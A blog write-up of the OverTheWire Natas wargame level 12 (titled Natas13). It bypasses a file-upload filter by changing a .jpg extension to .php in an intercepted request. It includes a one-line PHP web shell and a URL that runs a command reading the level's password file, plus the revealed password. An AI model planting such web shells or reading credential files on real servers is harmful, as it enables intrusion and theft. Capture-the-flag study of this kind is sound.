AlfaLogic

Veni, Vidi, Vici!

NatasOverTheWire

Natas13

alfamyk

Website URL: http://overthewire.org/wargames/natas/natas13.html

According to the data on the OverTheWire webpage.

Username: natas13
URL:      http://natas13.natas.labs.overthewire.org

Let’s log into the URL for Natas12

Fig.1

Looking at the source code:

Fig. 2

Well, it seems the script is taking the file we supply, and saving it on the server with a randomized name, but a file extension of “.jpg”. Let’s try to see what happens if we upload a filetype other than a JPEG image. I’ll try and upload a file named “test.txt” containing some text.

Meanwhile, Let’s also do one thing, which is to intercept the POST request that the script is sending to see it’s contents. I’ll do it using Burpsuite and here skip down to the interesting part.

Fig, 3

Here, we can see what’s happening clearly…the script is generating the filename and sending it in the request and subsequently, on the webpage, we get the following response from the server:

Fig, 4

Note that the filename sent by the script is not the same as the one sent back by the server as the filepath. Thus the filename itself is of little consequence to us. The crucial part is the file extension, which remains the same. The next logical question that we must ask is “What if we tamper with the file extension?”. I would expect the file on the server would have the modified extension, and since we get a path to the file, if we have an executable/runnable file extension, we should be able to execute it.

In order to test this hypothesis, we need to first create a payload i.e. the file which we’d be executing on the server. This payload could be in any language which the server supports. As a safe bet, I’ll prefer PHP (Since, we already know that the server supports it). 

<?php
passthru($_GET['cmd']);
?>

This simple payload takes a shell command from a get request and executes it. Let’s save it and upload it to the server. Also, we have to intercept the POST request to change the extension. Once intercepted, change the “.jpg” extension to “.php”

Fig. 5

Forward this modified request and see the response in browser.

Fig. 6

We have got a PHP file access now! Let’s navigate to the file and add a GET request, which can be done in the URL itself.

We need to add to the filename the following:

http://natas12.natas.labs.overthewire.org/upload/j6yopq02vo.php?cmd=cat%20/etc/natas_webpass/natas13
Fig. 7


Done!

Password for next level: jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY

You May Also Like

Bandit5

alfamyk

Bandit3

alfamyk

Natas12

alfamyk

Leave a Reply

Your email address will not be published. Required fields are marked *